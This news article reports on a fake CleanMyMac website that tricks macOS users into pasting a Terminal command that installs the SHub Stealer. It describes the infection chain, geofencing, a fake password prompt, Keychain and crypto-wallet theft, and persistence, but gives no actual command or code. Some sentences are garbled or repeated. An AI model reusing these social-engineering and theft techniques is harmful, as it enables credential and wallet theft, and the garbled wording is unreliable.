Fake CleanMyMac Website Pushes SHub Stealer To Drain Crypto Wallet Data

A phony CleanMyMac website is being used by a new macOS malware campaign to trick users into infecting their own computers This article explores malwarebytes purpose. . The website instructs users to open Terminal and paste a command rather than providing a standard app download.

The SHub Stealer malware family, which targets passwords, browser data, Apple Keychain contents, cryptocurrency wallets, and messaging sessions, is silently installed by that command. Neither MacPaw nor the authentic CleanMyMac product are associated with the fraudulent website. Its primary trick is straightforward but powerful: it presents the installation procedure as a sophisticated choice for seasoned users. Following the victim's pasting of the command, a seemingly authentic message is printed, a hidden link is decoded, a shell script is downloaded from an attacker-controlled server, and it is immediately executed via zsh.

Many macOS safeguards, including Gatekeeper and notarization checks, are largely circumvented because the user executes the command voluntarily, according to Malwarebytes. Data Theft and ClickFix Delivery This attack employs a technique called ClickFix, in which the victim is tricked into manually executing malware. The first-stage loader examines the device after it is launched before proceeding.

Crypto wallets are the target of SHub (Source: malwarebytes) One preliminary check looks for a Russian-language Mac keyboard. If one is discovered, the malware halts and notifies its server of the occurrence. Malware associated with Russian-speaking cybercriminals, who frequently steer clear of infecting systems within their own region, frequently uses this type of geofencing.

The malware transmits system information to its command-and-control server, including the external IP address, hostname, macOS version, and keyboard locale, if the target successfully completes the check. The main AppleScript payload is then downloaded, the Terminal window is closed to conceal the attack, and a phony System Preferences password prompt is displayed. SHub can grant access to the Keychain, which holds private keys, tokens, Wi-Fi credentials, and saved passwords, if the user inputs the right macOS password.

Crypto wallets are the target of SHub (Source: malwarebytes) The malware then collects data from Chromium-based browsers, Firefox, Safari, Telegram, Apple Notes, iCloud data, shell history files, and developer configuration files.

Additionally, it searches for local wallet apps and browser extensions for cryptocurrency wallets, such as Exodus, Atomic Wallet, Ledger Live, Ledger Wallet, and Trezor Suite. Persistence and Wallet Hijacking SHub is more than just theft. It can substitute backdoored versions of certain wallet apps' core logic files if it finds them.

Crypto wallets are the target of SHub (Source: malwarebytes) The purpose of these altered apps is to steal malwarebytes seed phrases and wallet passwords the next time the user unlocks the wallet or goes through a phony recovery process. In order to stay persistent and get remote commands, the malware also installs a phony Google Keystone LaunchAgent. The campaign demonstrates the increasing sophistication of macOS threats. Legitimate apps seldom require users to paste installation commands into Terminal, which is still a clear warning sign.